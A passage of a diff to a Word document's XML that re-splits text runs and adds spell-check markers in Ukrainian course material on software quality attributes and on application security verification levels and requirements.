+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ідтримувати певну працездатність в заданих умовах.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4282,13 +5209,23 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Стійкість до відмов (fault tolerance) Здатність підтримувати заданий рівень працездатності при відмовах і порушеннях правил взаємодії з оточенням.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Ст</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ійкість до відмов (fault tolerance) Здатність підтримувати заданий рівень працездатності при відмовах і порушеннях правил взаємодії з оточенням.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4311,7 +5248,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Здатність до відновлення (recoverability). Здатність відновлювати певний рівень працездатності і цілісність даних після відмови, необхідні для цього час і ресурси.</w:t>
+        <w:t xml:space="preserve">Здатність до відновлення (recoverability). Здатність відновлювати певний </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>івень працездатності і цілісність даних після відмови, необхідні для цього час і ресурси.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4381,7 +5336,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Зрозумілість (understandability). Показник, зворотний до зусиль, витрачених користувачами, щоб сприйняти набір понять, на яких засновано ПО, і їх застосовність для вирішення своїх завдань.</w:t>
+        <w:t>Зрозумілість (understandability). Показник, зворотний до зусиль, витрачених користувачами, щоб сприйняти набі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> понять, на яких засновано ПО, і їх застосовність для вирішення своїх завдань.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4473,7 +5446,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Продуктивність (efficiency) або ефективність. Здатність ПЗ при заданих умовах забезпечувати необхідну працездатність стосовно виділеним для цього ресурсів. Можна визначити її і як відношення одержуваних за допомогою ПЗ результатів до витрачених на це ресурсів.</w:t>
+        <w:t xml:space="preserve">Продуктивність (efficiency) або ефективність. Здатність ПЗ при заданих умовах забезпечувати необхідну працездатність стосовно виділеним для цього ресурсів. Можна визначити її і як відношення одержуваних за допомогою ПЗ результатів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>до</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> витрачених на це ресурсів.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4519,7 +5510,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Ефективність використання ресурсів (resource utilisation). Здатність вирішувати потрібні завдання з використанням певних обсягів ресурсів певних видів. Маються на увазі такі ресурси, як оперативна і довгострокова пам'ять, мережеві з'єднання, пристрої введення і виведення, тощо.</w:t>
+        <w:t xml:space="preserve">Ефективність використання ресурсів (resource utilisation). Здатність вирішувати потрібні завдання з використанням певних обсягів ресурсів певних видів. Маються на увазі такі ресурси, як оперативна і довгострокова </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>пам'ять</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, мережеві з'єднання, пристрої введення і виведення, тощо.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4589,7 +5598,25 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>аналізований (analyzability) або зручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недоліків, а також зручність аналізу на предмет необхідних змін і їх можливих ефектів.</w:t>
+        <w:t>аналізований (analyzability) або зручність проведення аналізу. Зручність проведення аналізу помилок, дефектів і недолі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>к</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ів, а також зручність аналізу на предмет необхідних змін і їх можливих ефектів.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4635,7 +5662,43 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Зручність перевірки (testability). Показник, зворотний до трудовитрат на проведення тестування та інших видів перевірки того, що внесені зміни привели до потрібних ефектів.</w:t>
+        <w:t xml:space="preserve">Зручність </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>перев</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ірки (testability). Показник, зворотний до трудовитрат на проведення тестування та інших видів перевірки того, що внесені зміни привели до потрібних ефекті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4704,7 +5767,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до різних оточенням без проведення для цього дій, крім заздалегідь передбачених.</w:t>
+        <w:t xml:space="preserve">Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ізних оточенням без проведення для цього дій, крім заздалегідь передбачених.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4773,8 +5854,18 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Зручність заміни (replaceability) іншого ПО даними. Здатність ПЗ використовуватися замість іншого ПО для вирішення тих же самих завдань в заданому оточенні.</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Зручність заміни (replaceability) іншого ПО даними. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Здатність ПЗ використовуватися замість іншого ПО для вирішення тих же самих завдань в заданому оточенні.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4958,7 +6049,27 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>можна виділити три рівні перевірки безпеки програмних додатків</w:t>
+        <w:t xml:space="preserve">можна виділити три </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>івні перевірки безпеки програмних додатків</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4984,6 +6095,7 @@
         <w:lastRenderedPageBreak/>
         <w:br/>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4992,7 +6104,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Рівень1 призначений для всіх програм.</w:t>
+        <w:t>Р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень1 призначений для всіх програм.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5009,6 +6132,7 @@
           <w:lang w:val="uk-UA"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5017,7 +6141,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Рівень 2 призначений для додатків, які містять конфіденційні дані, які вимагають захисту.  </w:t>
+        <w:t>Р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень 2 призначений для додатків, які містять конфіденційні дані, які вимагають захисту.  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5392,7 +6527,51 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Елементи управління рівня 1 можуть бути забезпечені або автоматично за допомогою інструментів, або просто вручну без доступу до вихідного коду. Ми розглядаємо рівень 1 як мінімум необхідний для всіх додатків. Загрози для додатка, швидше за все, будуть від зловмисників, які використовують прості і маловитратні методи для виявлення легкодоступних і простих у використанні вразливостей.</w:t>
+        <w:t xml:space="preserve">Елементи управління </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">івня 1 можуть бути забезпечені або автоматично за допомогою інструментів, або просто вручну без доступу до вихідного коду. Ми розглядаємо </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень 1 як мінімум необхідний для всіх додатків. Загрози для додатка, швидше за все, будуть від зловмисників, які використовують прості і маловитратні методи для виявлення легкодоступних і простих у використанні вразливостей.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5495,6 +6674,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5503,8 +6683,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>рівня</w:t>
-      </w:r>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5513,6 +6694,16 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>івня</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
       <w:r>
@@ -5823,7 +7014,51 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в додатку. Рівень 2, як правило, підходить для додатків, обробних значні бізнес-бізнес операцій, в тому числі ті, які обробляють інформацію в галузі охорони здоров'я, реалізації бізнес-критичних або чутливих функцій або процесів інших чутливих активів. Загрози застосування 2-го рівня, як правило, будуть кваліфіковані та мотивовані атакуючі зосередивши увагу на конкретних задач з використанням інструментів і методів, які високо практикували і ефективних на виявлення і використання слабких місць в додатках</w:t>
+        <w:t xml:space="preserve">Рівень 2 забезпечує контроль безпеки на місці, ефективний і використовується в додатку. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>івень 2, як правило, підходить для додатків, обробних значні бізнес-бізнес операцій, в тому числі ті, які обробляють інформацію в галузі охорони здоров'я, реалізації бізнес-критичних або чутливих функцій або процесів інших чутливих активів. Загрози застосування 2-го рівня, як правило, будуть кваліфіковані та мотивовані атакуючі зосередивши увагу на конкретних задач з використанням інструментів і методі</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>, які високо практикували і ефективних на виявлення і використання слабких місць в додатках</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6162,7 +7397,29 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>1. Архітектура, проектування та моделювання загроз</w:t>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Арх</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ітектура, проектування та моделювання загроз</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7157,7 +8414,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся в тому, що архітектура високого рівня для </w:t>
+              <w:t xml:space="preserve">Переконайтеся в тому, що </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>арх</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ітектура високого рівня для </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7368,7 +8647,51 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що всі компоненти програми визначаються з точки зору бізнес-функцій і / або функцій безпеки, які вони забезпечують.</w:t>
+              <w:t xml:space="preserve">Переконайтеся </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>в</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>тому</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>, що всі компоненти програми визначаються з точки зору бізнес-функцій і / або функцій безпеки, які вони забезпечують.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8193,7 +9516,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся, що компоненти відокремлені один від одного за допомогою певного контролю безпеки, такі як мережевий сегментації, правила брандмауера або групи безпеки на основі хмарних обчислень.</w:t>
+              <w:t xml:space="preserve">Переконайтеся, що компоненти відокремлені один від одного за допомогою певного контролю безпеки, такі як мережевий сегментації, правила брандмауера або групи безпеки </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>на</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> основі хмарних обчислень.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8390,7 +9735,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">Переконайтеся, що програма має чіткий поділ між шаром даних, контролером шаром і шаром дисплея, таким чином, що рішення безпеки може </w:t>
+              <w:t xml:space="preserve">Переконайтеся, що програма має чіткий поділ між шаром даних, контролером шаром і </w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>шаром</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> дисплея, таким чином, що рішення безпеки може </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9814,7 +11181,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> означає, що облікові дані зберігаютьс</w:t>
+              <w:t xml:space="preserve"> означа</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>є,</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> що облікові дані зберігаютьс</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10328,7 +11717,29 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>пароля включає в себе старий пароль, новий пароль і підтвердження пароля.</w:t>
